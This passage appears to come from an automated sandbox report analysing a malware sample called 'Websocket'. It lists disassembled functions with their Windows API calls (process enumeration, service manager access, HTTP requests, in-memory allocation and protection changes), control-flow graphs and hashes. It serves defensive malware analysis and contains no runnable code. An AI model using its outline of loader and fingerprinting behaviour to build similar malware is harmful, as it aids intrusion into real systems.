                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                                    • String ID: 'aR
                                    • API String ID: 1741791824-1895538066
                                    • Opcode ID: 860bacdee53bdf97e4bfc17b82b5eb497c59e064d185f9ac85d0c77df9b88045
                                    • Instruction ID: 8e2e54b4294c2f8b4c886945227f95a068d2d7f983647ab479f808cbfc4ffeac
                                    • Opcode Fuzzy Hash: 860bacdee53bdf97e4bfc17b82b5eb497c59e064d185f9ac85d0c77df9b88045
                                    • Instruction Fuzzy Hash: 76B1E330A043124BDB54AF659C617EAB6E7AFC8700F5C482EF956DB3A0EA70CD9187C5
                                    Function 00614B90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 379 614b90-614ba6 380 614bb0-614bb5 379->380 381 614c75-614c7a 380->381 382 614bbb 380->382 385 614c7c-614c81 381->385 386 614cbe-614cc3 381->386 383 614bbd-614bc2 382->383 384 614c2e-614c3d 382->384 389 614cc8-614ccf 383->389 390 614bc8-614bcd 383->390 387 614c5a-614c70 Process32FirstW 384->387 388 614c3f-614c55 call 613e40 call 613da0 384->388 391 614c83-614c8a 385->391 392 614ca9-614cae 385->392 386->380 387->380 388->387 396 614cd1-614ce7 call 613e40 call 613da0 389->396 397 614cec-614ced FindCloseChangeNotification 389->397 398 614c16-614c2c 390->398 399 614bcf-614bd4 390->399 391->387 393 614c8c-614ca7 call 613e40 call 613da0 391->393 392->380 394 614cb4-614cbd 392->394 393->387 396->397 404 614cef-614cf8 397->404 398->380 399->392 403 614bda-614be1 399->403 409 614be3-614bf9 call 613e40 call 613da0 403->409 410 614bfe-614c09 CreateToolhelp32Snapshot 403->410 409->410 410->404 411 614c0f-614c14 410->411 411->380
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00614C02
                                    • Process32FirstW.KERNEL32(?,0000022C), ref: 00614C60
                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?), ref: 00614CED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32
                                    • String ID: @UJ)$.v
                                    • API String ID: 692674288-3001562398
                                    • Opcode ID: 93fab4b0329c7f86d1acd158facd3a1826d1d1c2ea7203a3150073a857f33c43
                                    • Instruction ID: 4c161251708126898c93b84d320cbb5e798c5366a9a25ffae6e2b0f51e23f35c
                                    • Opcode Fuzzy Hash: 93fab4b0329c7f86d1acd158facd3a1826d1d1c2ea7203a3150073a857f33c43
                                    • Instruction Fuzzy Hash: C4313F71B1431157D7645AB8AC966FE32D79B80710B1C841BF816DB390ED38CDC687D1
                                    Function 00619530 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 201COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 516 619530-619548 517 619550-619555 516->517 518 6196f4-6196f9 517->518 519 61955b 517->519 520 6197c7-6197cc 518->520 521 6196ff 518->521 522 619561-619566 519->522 523 61967d-619684 519->523 524 619580-619585 520->524 525 6197d2-6197f7 520->525 528 619701-619706 521->528 529 619773-61977a 521->529 530 619614-619619 522->530 531 61956c 522->531 526 6196a1-6196ac 523->526 527 619686-61969c call 613e40 call 613da0 523->527 524->517 532 619587-619593 524->532 525->517 553 6196c9-6196da 526->553 554 6196ae-6196c4 call 613e40 call 613da0 526->554 527->526 535 619722-619729 528->535 536 619708-61970d 528->536 537 619797-6197a6 OpenSCManagerW 529->537 538 61977c-619792 call 613e40 call 613da0 529->538 530->524 533 61961f-619678 530->533 539 6195e3-6195ea 531->539 540 61956e-619573 531->540 533->517 543 619746-61976e call 613c80 535->543 544 61972b-619741 call 613e40 call 613da0 535->544 536->524 548 619713-61971d call 617950 536->548 545 6197a8-6197b8 537->545 546 6197bd-6197c2 537->546 538->537 550 619607-61960f 539->550 551 6195ec-619602 call 613e40 call 613da0 539->551 541 619575-61957a 540->541 542 619594-61959c 540->542 541->524 555 6197fc-619803 541->555 557 6195bc-6195d0 542->557 558 61959e-6195b6 call 613e40 call 613da0 542->558 543->517 544->543 545->517 546->517 548->517 550->517 551->550 587 6196e0-6196ef 553->587 588 619848-619854 553->588 554->553 567 619820-61982b 555->567 568 619805-61981b call 613e40 call 613da0 555->568 582 6195d4-6195de 557->582 558->557 591 61982f-619845 call 613000 567->591 568->567 582->517 587->517 591->588
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,33A6B453,?,?), ref: 006197A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ManagerOpen
                                    • String ID: p^6w$y7@+
                                    • API String ID: 1889721586-3557144604
                                    • Opcode ID: 2f80413df1c524e5ab51c22356e848ec4d8529ca363f28f136bda6e15b75c5da
                                    • Instruction ID: 49e09286e40e7d4b52b9e2b6658c01c9a2fd456c07814ee67471228fd3742618
                                    • Opcode Fuzzy Hash: 2f80413df1c524e5ab51c22356e848ec4d8529ca363f28f136bda6e15b75c5da
                                    • Instruction Fuzzy Hash: 2671A3707043019BD758DF38A9657EB76A7AB90B00F1C482EF146DB391EA30DD89C7A6
                                    Function 00619860 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 598 619860-619876 599 619880-619885 598->599 600 61988b 599->600 601 6199be-6199c3 599->601 602 619891-619896 600->602 603 6199b4-6199b9 600->603 604 619a54-619a5b 601->604 605 6199c9-6199ce 601->605 606 61995a-619970 602->606 607 61989c-6198a1 602->607 603->599 608 619a78 604->608 609 619a5d-619a73 call 613e40 call 613da0 604->609 610 6199d0-6199d7 605->610 611 619a3c-619a41 605->611 613 619972-619988 call 613e40 call 613da0 606->613 614 61998d-61999e 606->614 615 619920-619927 call 619a90 607->615 616 6198a3-6198a8 607->616 625 619a7b-619a85 608->625 609->608 618 6199f4-619a09 610->618 619 6199d9-6199ef call 613e40 call 613da0 610->619 611->599 612 619a47-619a51 611->612 613->614 614->625 643 6199a4-6199af 614->643 640 619929-619930 615->640 641 6198e8-6198ef 615->641 616->611 622 6198ae-6198b5 616->622 638 619a26-619a37 618->638 639 619a0b-619a21 call 613e40 call 613da0 618->639 619->618 628 6198d2-6198df FindFirstChangeNotificationW call 619a90 622->628 629 6198b7-6198cd call 613e40 call 613da0 622->629 650 6198e4-6198e6 628->650 629->628 638->599 639->638 648 619932-619948 call 613e40 call 613da0 640->648 649 61994d 640->649 651 6198f1-619907 call 613e40 call 613da0 641->651 652 61990c-61991b 641->652 643->599 648->649 656 619950-619955 649->656 650->641 650->656 651->652 652->599 656->599
                                    APIs
                                    • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 006198DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeFindFirstNotification
                                    • String ID: Ma:$Ma:
                                    • API String ID: 1065410024-930586552
                                    • Opcode ID: cdb0ab4be74b081fc242a6d8bb531fcfca3e7019507579728da780b479ebc805
                                    • Instruction ID: 9c9937a3955bf0c5794b9536f45e1f9d6e905c08653cfd3522dba7bb3295c9e2
                                    • Opcode Fuzzy Hash: cdb0ab4be74b081fc242a6d8bb531fcfca3e7019507579728da780b479ebc805
                                    • Instruction Fuzzy Hash: 8A418770B003109BDB98EF7558616FA3697AF94700B0C482FF556CB390EA34CD8597A6
                                    Function 00616D70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109libraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 669 616d70-616d77 670 616d80-616d85 669->670 671 616e14-616e19 670->671 672 616d8b 670->672 673 616e1f 671->673 674 616eee-616ef3 671->674 675 616dfb-616e0f call 616cd0 672->675 676 616d8d-616d92 672->676 680 616e21-616e26 673->680 681 616e56-616e69 call 613480 673->681 682 616ef9-616f0a call 616cd0 674->682 683 616da8-616dad 674->683 675->670 678 616d94 676->678 679 616dde-616de3 676->679 685 616d96-616d9b 678->685 686 616dc8-616ddc call 616cd0 678->686 679->683 692 616de5-616df9 call 616cd0 679->692 688 616e28-616e2d 680->688 689 616e3d-616e51 call 616cd0 680->689 705 616e86-616e99 LoadLibraryW 681->705 706 616e6b-616e81 call 613e40 call 613da0 681->706 682->670 683->670 687 616daf-616db1 683->687 693 616db2-616dc6 call 616cd0 685->693 694 616d9d-616da2 685->694 686->670 688->683 695 616e33-616e38 688->695 689->670 692->670 693->670 694->683 701 616f0f-616f1a 694->701 695->670 708 616eb6-616ec1 705->708 709 616e9b-616eb1 call 613e40 call 613da0 705->709 706->705 719 616ec3-616ed9 call 613e40 call 613da0 708->719 720 616ede-616ee9 708->720 709->708 719->720 720->670
                                    APIs
                                      • Part of subcall function 00616CD0: LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00616F05,?,33A6B453,006168AC), ref: 00616D00
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,006168AC), ref: 00616E87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: ;g+$;g+
                                    • API String ID: 1029625771-3974242271
                                    • Opcode ID: d3c72ccec23f4893d261341fc1dff00a732c1bc871969f1e7482b796101b9526
                                    • Instruction ID: c9ce0f1ec563a7ac194f30829bbc572a8be8fc4ea53d4688ecff0f80c278f163
                                    • Opcode Fuzzy Hash: d3c72ccec23f4893d261341fc1dff00a732c1bc871969f1e7482b796101b9526
                                    • Instruction Fuzzy Hash: 1631831CB0922087DAA8AE7DE8556FE25579F84300B2D943BF546CB3A0D934CCC297D6
                                    Function 00615B40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 00615B9B
                                    • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00615C0A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateFree
                                    • String ID: p^6w
                                    • API String ID: 2488874121-1797523920
                                    • Opcode ID: d2369ef7701e9273cc4d041dae5391489af07f323d1920c69017d3ebeea5d0fc
                                    • Instruction ID: e0fed74b7f3156526858a4fb734428429dccac94411a91e9041c7c5b70f91df5
                                    • Opcode Fuzzy Hash: d2369ef7701e9273cc4d041dae5391489af07f323d1920c69017d3ebeea5d0fc
                                    • Instruction Fuzzy Hash: C6118470F007105BDB94AB796C51ADA76D7AFC8750B0C843FF506CB391EA24CD424795
                                    Function 0060002D Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 789 60002d-60009e call 600456 * 6 802 6000a0-6000a2 789->802 803 6000a7-6000b0 789->803 804 60044e-600455 802->804 803->802 805 6000b2-6000b6 803->805 805->802 806 6000b8-6000c2 805->806 807 6000e4-600105 GetNativeSystemInfo 806->807 808 6000c4-6000c7 806->808 807->802 810 600107-60012d VirtualAlloc 807->810 809 6000c9-6000cf 808->809 811 6000d1-6000d4 809->811 812 6000d6 809->812 813 600162-60016c 810->813 814 60012f-600133 810->814 817 6000d9-6000e2 811->817 812->817 815 6001a4-6001b5 813->815 816 60016e-600173 813->816 818 600135-600138 814->818 820 600234-600240 815->820 821 6001b7-6001d1 815->821 819 600177-60018a 816->819 817->807 817->809 822 600153-600155 818->822 823 60013a-600142 818->823 824 600199-60019e 819->824 825 60018c-600193 819->825 826 6002f0-6002fa 820->826 827 600246-60025d 820->827 842 600222-60022e 821->842 843 6001d3 821->843 829 600157-60015c 822->829 823->822 828 600144-600147 823->828 824->819 834 6001a0 824->834 825->825 831 600195 825->831 832 600300-600307 826->832 833 6003b2-6003c7 call 7327b0 826->833 827->826 835 600263-600273 827->835 837 600149-60014c 828->837 838 60014e-600151 828->838 829->818 830 60015e 829->830 830->813 831->824 839 600309-600312 832->839 857 6003c9-6003ce 833->857 834->815 840 6002d5-6002e6 835->840 841 600275-600279 835->841 837->822 837->838 838->829 846 6003a7-6003ac 839->846 847 600318-600333 839->847 840->835 844 6002ec 840->844 848 60027a-600289 841->848 842->821 845 600230 842->845 849 6001d7-6001db 843->849 844->826 845->820 846->833 846->839 851 600335-600337 847->851 852 60034d-60034f 847->852 853 600291-60029a 848->853 854 60028b-60028f 848->854 855 6001fb-600204 849->855 856 6001dd 849->856 858 600340-600343 851->858 859 600339-60033e 851->859 862 600351-600353 852->862 863 600368-60036a 852->863 861 6002c3-6002c7 853->861 854->853 860 60029c-6002a1 854->860 865 600207-60021c 855->865 856->855 864 6001df-6001f9 856->864 866 6003d0-6003d4 857->866 867 60044c 857->867 871 600345-60034b 858->871 859->871 872 6002a3-6002b2 860->872 873 6002b4-6002b7 860->873 861->848 868 6002c9-6002d1 861->868 874 600355-600357 862->874 875 600359-60035b 862->875 869 600371-600376 863->869 870 60036c 863->870 864->865 865->849 880 60021e 865->880 866->867 879 6003d6-6003e0 866->879 867->804 868->840 881 600379-600380 869->881 877 60036e-60036f 870->877 871->881 872->861 873->861 876 6002b9-6002bf 873->876 874->877 875->863 878 60035d-60035f 875->878 876->861 877->881 878->881 882 600361-600366 878->882 879->867 883 6003e2-6003e6 879->883 880->842 884 600382 881->884 885 600388-60039d VirtualProtect 881->885 882->881 883->867 886 6003e8-6003f9 883->886 884->885 885->802 887 6003a3 885->887 886->867 888 6003fb-600400 886->888 887->846 889 600402-60040f 888->889 889->889 890 600411-600415 889->890 891 600417-600429 890->891 892 60042d-600433 890->892 891->888 893 60042b 891->893 892->867 894 600435-60044b 892->894 893->867 894->867
                                    APIs
                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,00600005), ref: 006000E9
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00600005), ref: 00600111
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_600000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocInfoNativeSystemVirtual
                                    • String ID:
                                    • API String ID: 2032221330-0
                                    • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction ID: 6a056932634aca41250867a94fda34c42f8ef56db5c7f801923ae1e46585df77
                                    • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction Fuzzy Hash: 8FD1E171A843069FE718CF59C8807ABB3E2FF84308F18452DE8958B381E774E945CB91
                                    Function 00619A90 Relevance: 4.6, APIs: 3, Instructions: 95stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 897 619a90-619a9e 898 619aa0-619aa5 897->898 899 619b88-619b8d 898->899 900 619aab 898->900 901 619ac3-619ac8 899->901 902 619b93-619b98 899->902 903 619ab1-619ab6 900->903 904 619b49-619b50 900->904 901->898 909 619aca-619ad5 901->909 902->898 905 619ad6-619ae6 903->905 906 619ab8-619abd 903->906 907 619b52-619b68 call 613e40 call 613da0 904->907 908 619b6d-619b83 904->908 910 619b06-619b0e 905->910 911 619ae8-619b00 call 613e40 call 613da0 905->911 906->901 912 619b9d-619ba4 906->912 907->908 908->898 917 619b10-619b28 call 613e40 call 613da0 910->917 918 619b2e-619b44 GetCurrentProcess QueryFullProcessImageNameW 910->918 911->910 919 619bc1-619be5 lstrcmpiW 912->919 920 619ba6-619bbc call 613e40 call 613da0 912->920 917->918 918->898 920->919
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 00619B3A
                                    • QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 00619B3D
                                    • lstrcmpiW.KERNELBASE(?,?,0DFA437B,?), ref: 00619BCE
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentFullImageNameQuerylstrcmpi
                                    • String ID:
                                    • API String ID: 3605714105-0
                                    • Opcode ID: 970441976f24fdcca0b2e0f19bc1c3d5d5eda8d79af472907177c8c55f135b00
                                    • Instruction ID: 4699aacc24ed5ba9a62859704b2fb74570914d950689084723e6fcac961e89ee
                                    • Opcode Fuzzy Hash: 970441976f24fdcca0b2e0f19bc1c3d5d5eda8d79af472907177c8c55f135b00
                                    • Instruction Fuzzy Hash: D131F471B143104BDB689B69A851AEB32D7ABC8750F4D442FB442CB360D974CD858BA1
                                    Function 0041025B Relevance: 4.6, APIs: 3, Instructions: 58memoryCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 934 41025b-410267 935 410269-41026a 934->935 936 4102d8-4102ea call 412a79 call 411e2c 934->936 938 41026b-410272 935->938 952 4102ec-4102ee 936->952 940 410274-41028b call 412a13 call 412864 call 41257e 938->940 941 41028c-41028e 938->941 940->941 942 410290-410292 941->942 943 410294-410296 941->943 946 410297-4102aa RtlAllocateHeap 942->946 943->946 950 4102d2-4102d6 946->950 951 4102ac-4102b5 946->951 950->952 954 4102c4-4102c9 call 411e2c 951->954 955 4102b7-4102c0 call 412a79 951->955 962 4102cb-4102d0 call 411e2c 954->962 955->938 963 4102c2 955->963 962->950 963->962
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00410274
                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A3A
                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A44
                                    • __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 00412864: GetModuleFileNameW.KERNEL32(00000000,0041F722,00000104,00000001,00000000,?), ref: 00412900
                                      • Part of subcall function 00412864: __invoke_watson.LIBCMT ref: 00412929
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041292F
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041293C
                                      • Part of subcall function 0041257E: ___crtCorExitProcess.LIBCMT ref: 00412586
                                      • Part of subcall function 0041257E: ExitProcess.KERNEL32 ref: 0041258F
                                      • Part of subcall function 00411E2C: __getptd_noexit.LIBCMT ref: 00411E2C
                                    • RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: ExitProcess_wcslen$AllocateFileHeapModuleName___crt__getptd_noexit__invoke_watson
                                    • String ID:
                                    • API String ID: 4285633346-0
                                    • Opcode ID: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
                                    • Instruction ID: 7e8d332be424b32aeb7339ed39cdb599a77868d368d5d78e5393627917a903ca
                                    • Opcode Fuzzy Hash: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
                                    • Instruction Fuzzy Hash: 7401B535244301AAE22177B6BC56BEB3748AF81378F20007BF505962E1DAFC8CD5826D
                                    Function 00613060 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 166memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00000220), ref: 006131CB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: p^6w
                                    • API String ID: 1279760036-1797523920
                                    • Opcode ID: 9cc57feeb7c3e69f2414265ec16f46ea251e3d1244b090e51a8204ab6576f9b3
                                    • Instruction ID: 1b02b47bfaf2d5286ea4a51cce5270a1a73a26dc38cca3008b6f40b43b68e92b
                                    • Opcode Fuzzy Hash: 9cc57feeb7c3e69f2414265ec16f46ea251e3d1244b090e51a8204ab6576f9b3
                                    • Instruction Fuzzy Hash: DE51C471B043118BDB58DF6894955EEBBE2ABD8340F18892EF447C7350DB30DE8A8792
                                    Function 00619BF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,00619860,00000000,00000000,00000000,33A6B453,00616695), ref: 00619D11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID: p^6w
                                    • API String ID: 2422867632-1797523920
                                    • Opcode ID: f84486140e83c6c7cbae18918cac13ea11ec0da0d6b002cab4877abaca9da015
                                    • Instruction ID: 4be169de99d358ef2d922bf6127ee7e8bd10c34e58ec6b9ec947573df4d06db9
                                    • Opcode Fuzzy Hash: f84486140e83c6c7cbae18918cac13ea11ec0da0d6b002cab4877abaca9da015
                                    • Instruction Fuzzy Hash: 57215E70B403005BDBA89B355D22BEA32D36B94B00F1C842FB546DF7D0EA31DD418B95
                                    Function 006145C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,33A6B453), ref: 0061462F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FullImageNameProcessQuery
                                    • String ID: .v
                                    • API String ID: 3578328331-2572790428
                                    • Opcode ID: c481d70da30b05dd9cc4e151c4b4effcf81ebf46755526d22e70a33a2f9e5c88
                                    • Instruction ID: e64ca5bd4abfcc58d05b6ba3d0723a688b8b691b7a89506911c33b34e0822ded
                                    • Opcode Fuzzy Hash: c481d70da30b05dd9cc4e151c4b4effcf81ebf46755526d22e70a33a2f9e5c88
                                    • Instruction Fuzzy Hash: 0101ADB1B052201BD794AB79AC01EEB669B9FC4B55B1D402EB506CB390EE34CD814390
                                    Function 00615410 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006154B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InformationVolume
                                    • String ID: P4v
                                    • API String ID: 2039140958-1107188653
                                    • Opcode ID: 60f764c9cef8e689ef5fa71d40ea95ce8454db267e11fd7de0749888cadb22f2
                                    • Instruction ID: 7be8a3f5d72b219152b8e31b755d4e4ce4691babdb6405a4921123964f90835e
                                    • Opcode Fuzzy Hash: 60f764c9cef8e689ef5fa71d40ea95ce8454db267e11fd7de0749888cadb22f2
                                    • Instruction Fuzzy Hash: 64110C706007009BE764EB60C846BEAB3F6AF94701F9C881DA556CB2D0EBB8D9C5C756
                                    Function 006141C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00000050), ref: 00614214
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: p^6w
                                    • API String ID: 1279760036-1797523920
                                    • Opcode ID: 847572725a331997d28623c202b283d5d8155e63dd5f59030540aa9b3d0d6e83
                                    • Instruction ID: 69c71e376edb4998587d9fa95d3ee63163a35d2910d60dbbcb641e36d1b79ebd
                                    • Opcode Fuzzy Hash: 847572725a331997d28623c202b283d5d8155e63dd5f59030540aa9b3d0d6e83
                                    • Instruction Fuzzy Hash: 8FE03021F403505B9B94A7B9A8459EE26A76FC8B0074C842BB405CB390EE348D424B91
                                    Function 0040EC40 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42memoryCOMMON
